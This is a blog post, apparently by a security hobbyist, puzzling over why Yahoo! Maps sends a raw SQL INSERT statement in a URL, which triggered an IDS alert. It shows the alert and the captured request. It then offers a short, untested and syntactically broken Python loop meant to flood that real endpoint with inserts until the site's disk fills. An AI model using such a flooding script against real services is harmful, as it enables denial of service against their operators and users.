SQLi by Design?

 

Now by no means do I claim to be a good developer, but security I know a little bit about.  So when I ran accross this I just had to share and see if anyone would pipe up and either A. tell me whats going on or B. hack Yahoo!  So here is what I have picked up.

User goes to Yahoo! maps (maps.yahoo.com) and wants to find out where Microsoft’s office is in Redmound, WA.  So they just type in Microsoft, Redmound and hit enter.  WTF?!  If you have any type of Network Based IDS/IPS you will probably be notified that it stopped an outbound SQLi packet.

HTTP: SQL Injection (INSERT)
Hits:            1 packets (864 bytes)
Packet Trace:    Yes
Action:          Block
Period:          1
Total Hit Count: 1 packets (864 bytes)

Obviously this caught my interest so I fired up good old Fiddler2 and searched again.  While Fiddler2 was capturing the traffic it verified the URI request did look like SQLi. What the hell is going on? Part of the URI request included

GET /v1/public/yql?callback=loadData&q=INSERT%20INTO%20user.location.public%20(app%2C%20ctx%2C%20type
%2C%20address%2C%20crumb)%20VALUES%20(%20%22maps%22%2C%20%22maps%22%2C%20%22saved%22%2C
%20%22Microsoft%20Way%2C%20Redmond%2C%20WA%2098052%22%2C%20%22Lmpubi9KRjdsVk8-%22)&
format=json HTTP/1.1

Which basically translates into a URL passing a SQL command which would be

INSERT INTO user.location.public (app, ctx, type, address, crumb) VALUES ( "maps", "maps", "saved", "Microsoft Way, Redmond, WA 98052", "Lmpubi9KRjdsVk8-")

OK, so there really is nothing malicious going on here.  Obviously seeing as how the NIDS/NIPS alerted the SQLi was outbound.  Now the question that I have is why?  Why pass a SQL command in a freakn’ URI?  Why not just pass the information to an page that process the SQL command on the server?  I have met, and know a ton of stupid developers (when it comes to security) but this just doesn’t make sense.

So instead of trying to figure out why they are doing this LETS HAVE SOME FUN WITH IT!  Oh just a quick note here nothing from this point on has been tested or verified.  Don’t want to get in shit over some stupid Yahoo! maps script so I have never ran anything against Yahoo!  Besides you will probably have to counterfeit some cookies along the way …

But generally speaking here we could take advantage of a site like this and crash it by filling up the database / disc space and potentially bring the site down.  So make a quick python script in your favorite text editor like so (you will also need curl).

import urllib2
stop = 0
while (stop != 1);
url = ‘http://us-locdrop.query.yahoo.com/v1/public/yql?callback=loadData&q=INSERT%20INTO%20user.location.public%20(app%2C%20ctx%2C%20type
%2C%20address%2C%20crumb)%20VALUES%20(%20%22maps%22%2C%20%22maps%22%2C%20%22saved%22%2C
%20%22Microsoft%20Way%2C%20Redmond%2C%20WA%2098052%22%2C%20%22Lmpubi9KRjdsVk8-%22)&
format=json HTTP/1.1’
getme = urllib2.urlopen(url)

Run the script until you terminate it from the CMD line.  Something like this would theoretically create entries in the table making the database larger on the disk.  Now if you have a super smart admin everything is located on one disk (bazinga) then sooner or later the entire site comes crashing down because the OS has no more disk space to work with.

Now getting back to reality it isn’t this simple, and if it is someone should lose their job!  But this takes me right back to the original question?  Why would a web developer (even a dumb one) use a full SQL command in a URL variable?

All Work on this site is not to be reproduced without written permision from Nick Schroedl.